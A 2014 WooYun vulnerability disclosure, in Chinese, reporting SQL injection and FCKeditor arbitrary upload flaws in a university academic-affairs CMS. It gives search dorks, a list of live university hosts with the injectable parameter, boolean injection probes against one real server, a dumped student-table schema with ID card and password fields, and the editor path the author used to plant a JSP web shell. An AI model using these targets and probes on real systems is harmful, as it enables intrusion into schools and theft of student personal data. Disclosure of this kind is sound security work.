漏洞详情

披露状态:

2014-03-20: 细节已通知厂商并且等待厂商处理中
2014-03-27: 厂商已经确认,细节仅向厂商公开
2014-03-30: 细节向第三方安全合作伙伴开放
2014-04-06: 细节向核心白帽子及相关领域专家公开
2014-04-16: 细节向普通白帽子公开
2014-05-06: 细节向实习白帽子公开
2014-05-04: 细节向公众公开

简要描述:

详细说明:

#1.该套"JSP+Oracle"的CMS主要用于大学、职业技术学校的教务系统,有不少大学(包括中国药科大学教务处)也在使用该套系统,其系统含有SQL注入漏洞和一个任意文件上传漏洞,导致不仅仅可以注入,也可以上传JSP脚本木马。通过谷歌、百度、搜狗等搜索引擎可以爬行到大量使用该教务系统的网站。

Google or Baidu
inurl:ACTIONSHOWNEWS
inurl:ACTIONSHOWNEWS.APPPROCESS





#2.注入点主要是在:“ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=”,其中NewsID存在注入,以下枚举二十多例存在该系统的站点供Cncert测试。

http://jw.bhcy.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=261 
http://jwcweb.lnpu.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1361
http://fzyjwc.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1521
http://ea.lnutcm.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=2381
http://edu.jnvc.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=4023
http://218.61.108.163/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=124
http://jwc.sau.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1081
http://211.82.200.116:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=244
http://jiaowu.dlufl.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=410
http://www1.hbjcxy.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=181
http://www.vtcsy.com:8080/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61
http://cityjw.dlut.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=163
http://121.22.25.5/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=270
http://218.7.95.52:800/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61
http://202.97.179.124:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1241
http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436
http://jwk.dlvtc.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=482
http://gz.syphu.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=301
http://jwgl.hrbcu.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=461
http://59.73.112.22/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=563
下面这几个没有发布新闻,所以没ID:
http://123.233.253.163:8080/index.jsp
http://218.8.131.152:8888/ACTIONSHOWFILES.APPPROCESS?mode=1
http://202.198.129.163/
http://221.211.54.6/ACTIONSHOWFILES.APPPROCESS?mode=1





以下是注入证明,例如“中国药科大学教务处”,

http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 and 1=1 正常



01.jpg



http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 and 1=2 出错



02.jpg



600多个表:

03.jpg



Table: BASE_STUDENT  ←-----------------------------------学生表的字段
[91 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| BANKID | VARCHAR2 |
| BIRTHADDRESSNO | VARCHAR2 |
| BIRTHDATE | DATE |
| BLOODNO | VARCHAR2 |
| CLASSNO | VARCHAR2 |
| COLLEGENO | VARCHAR2 |
| COMEDATE | DATE |
| COMEYEAR | NUMBER |
| CONVERSTATUSNO | VARCHAR2 |
| COUNTRYNO | VARCHAR2 |
| CREDITSTATUSNO | VARCHAR2 |
| DEGREELETTERNO | VARCHAR2 |
| DEGREENO | VARCHAR2 |
| DEPARTMENT | VARCHAR2 |
| DEPTNO | VARCHAR2 |
| DISPLOMANO | VARCHAR2 |
| ECARDPASS | VARCHAR2 |
| EMAILADDRESS | VARCHAR2 |
| ENGLISHNAME | VARCHAR2 |
| EXAMNO | VARCHAR2 |
| FAITHNO | VARCHAR2 |
| FILE_CARD | VARCHAR2 |
| FOREIGNLANGUAGE | VARCHAR2 |
| FOREIGNLANLEVEL | VARCHAR2 |
| GRADEYEAR | NUMBER |
| GRADUATENO | VARCHAR2 |
| HEALTHNO | VARCHAR2 |
| HKNO | VARCHAR2 |
| ID | NUMBER |
| ID_CARD | VARCHAR2 |
| IDKINDNO | VARCHAR2 |
| IFGRADUATE | NUMBER |
| IFHAVEDEGREE | NUMBER |
| INPOS | VARCHAR2 |
| ISTEACHMODIFY | NUMBER |
| LETTERMODENO | VARCHAR2 |
| LIBRARY_CARD | VARCHAR2 |
| LIVEROOM | VARCHAR2 |
| MAILADDRESS | VARCHAR2 |
| MAJORDIRECTIONNO | VARCHAR2 |
| MAJORLEVEL | VARCHAR2 |
| MAJORNO | VARCHAR2 |
| MAJORSUBJECTNO | VARCHAR2 |
| MARRYNO | VARCHAR2 |
| MEMOS | VARCHAR2 |
| NAME | VARCHAR2 |
| NATIVE | VARCHAR2 |
| NATIVENO | VARCHAR2 |
| NOCHECKREASON | VARCHAR2 |
| NODEGREEREASON | VARCHAR2 |
| NOWADDRESS | VARCHAR2 |
| OPERNO | VARCHAR2 |
| OPERTIME | DATE |
| POLITICALID | VARCHAR2 |
| POSTALCODE | VARCHAR2 |
| RACEID | VARCHAR2 |
| RECRUITNO | VARCHAR2 |
| REGISTPLACE | VARCHAR2 |
| REGSTATUS | NUMBER |
| RICE_CARD | VARCHAR2 |
| SEASONNO | VARCHAR2 |
| SEX | VARCHAR2 |
| SEXID | VARCHAR2 |
| SORTGRADE | NUMBER |
| SPECIALPOWER | VARCHAR2 |
| SPECNO | VARCHAR2 |
| SPELLNAME | VARCHAR2 |
| STUDENTID | VARCHAR2 |
| STUDENTNAME | VARCHAR2 |
| STUDENTNO | VARCHAR2 |
| STUDENTNOCW | VARCHAR2 |
| STUDENTNOOLD | VARCHAR2 |
| STUDENTSTATUS | NUMBER |
| STUDENTTYPENO | VARCHAR2 |
| STUDYDIRECTNO | VARCHAR2 |
| STUFROMAREA | VARCHAR2 |
| STUHOMEPAGE | VARCHAR2 |
| STUPHOTO | BLOB |
| TEACHCLASSNO | VARCHAR2 |
| TELNO | VARCHAR2 |
| TOSTATION | VARCHAR2 |
| TRAINMODENO | VARCHAR2 |
| TUTORNO | VARCHAR2 |
| USEDNAME | VARCHAR2 |
| XKENDTIME | DATE |
| XKFORCESELECTED | NUMBER |
| XKIFENABLE | NUMBER |
| XKPHASENO | VARCHAR2 |
| XKSTARTTIME | DATE |
| XSBAT | VARCHAR2 |
| YEARLIMIT | NUMBER |
+------------------+----------+



不深入了,太多了懒得跑了~后台好像是:

http://edu.***.com/Main.jsp



09.jpg

漏洞证明:

#3.另外说到该系统的任意文件上传,不过有大多管理员还是聪明的删掉了,但还是有存在FckEditor编辑器的导致可以上传任意JSP脚本木马,编辑器漏洞地址:

http://edu.***.cn/FCKeditor/editor/filemanager/browser/default/browser.html?connector=./connectors/jsp/connector



例如一下:

04.jpg



05.jpg



06.jpg



07.jpg





#4.有编辑器的地方就是跑马场!下面是测试的Shell~

08.jpg



修复方案:

PS:测试的Shell(zone.jsp)已删除,看了下有编辑器的地方都成了跑马场了~感觉这系统必须淘汰!顺便说一下,看看Cncert能否找到学生注册的地方,注册一个用户进去,可能那里也有上传漏洞~之前好像看到了一个,但是忘记在哪里了~

版权声明:转载请注明来源 U神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-03-27 22:14

厂商回复:

CNVD确认所述情况,验证过程由上海交通大学协助完成,同时根据验证结果已经由CNVD转报给教育网应急组织——赛尔网络公司(CCERT直属)

最新状态:

暂无


漏洞评价: